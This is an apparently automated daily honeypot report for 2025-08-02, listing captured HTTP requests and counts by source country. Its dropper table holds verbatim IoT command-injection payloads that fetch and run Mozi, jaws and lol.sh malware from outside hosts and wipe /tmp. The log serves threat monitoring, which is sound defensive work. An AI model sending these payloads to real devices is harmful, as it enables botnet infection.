Skip to main content
  1. Daily-Posts/

Report: 2025-08-02

·340 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-02
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 11 new requests that have never been observed before (these were added to the monitored request database.).

A total of 468 requests were recorded during the day, originating from 7 different countries, with a peak of 179 requests coming from DE.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DEGermany

botnet_dropper_behaviour
#

remote_addrrequest
41.43.119.201GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
156.215.123.74GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
182.180.50.199GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
41.37.31.110GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
42.227.204.26GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.227.204.26:44131/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.93.93.18227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
87.121.79.165POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20lol.sh%3B%20tftp%20-g%20-r%20lol.sh%20-l%20lol.sh%20141.11.62.4%3B%20chmod%20777%20lol.sh%3B%20sh%20lol.sh%3B%20rm%20lol.sh%3B%20wget%20http%3A%2F%2F141.11.62.4%2Flol.sh%3B%20chmod%20777%20lol.sh%3B%20sh%20lol.sh%3B%20rm%20lol.sh%3B%20ftpget%20-v%20141.11.62.4%20%20lol.sh%3B%20chmod%20777%20lol.sh%3B%20sh%20lol.sh%3Brm%20-rf%20lol.sh HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
451GET /nmaplowercheck1754166875 HTTP/1.1
481GET /VOAv HTTP/1.1
531GET /nmaplowercheck1754166876 HTTP/1.1
581GET /NmapUpperCheck1754166876 HTTP/1.1
591GET /NmapUpperCheck1754166875 HTTP/1.1
631GET /Nmap/folder/check1754166875 HTTP/1.1
641GET /Nmap/folder/check1754166876 HTTP/1.1
2341\x00\x0E\x08\x0C\xE5!\xAA\xA7a\x1B\x0B\x00\x00\x00\x00\x00
2351\x00\x0E8\x0C\xE5!\xAA\xA7a\x1B\x0B\x00\x00\x00\x00\x00
2361\x00\x0E\x08\xE5+ZQJ\x9F^\xD1\x00\x00\x00\x00\x00
2371\x00\x0E8\xE5+ZQJ\x9F^\xD1\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0179DE
197US
233GB
319SC
417PL
517BG
69NL
79UA
89RO
98VN
107CN
117MU
126LT
135CA
145SG
154ZA
164IR
173KZ
183RU
193EG
202GH
212MN
222IN
232BR
242AR
252AU
262HK
272BE
281PK
291TH
301CH
311KR
321ID
331EE
341FR
351JP

Related

Report: 2025-08-01
·311 words
Repport Daily
Report: 2025-07-31
·296 words
Repport Daily
Report: 2025-07-30
·270 words
Repport Daily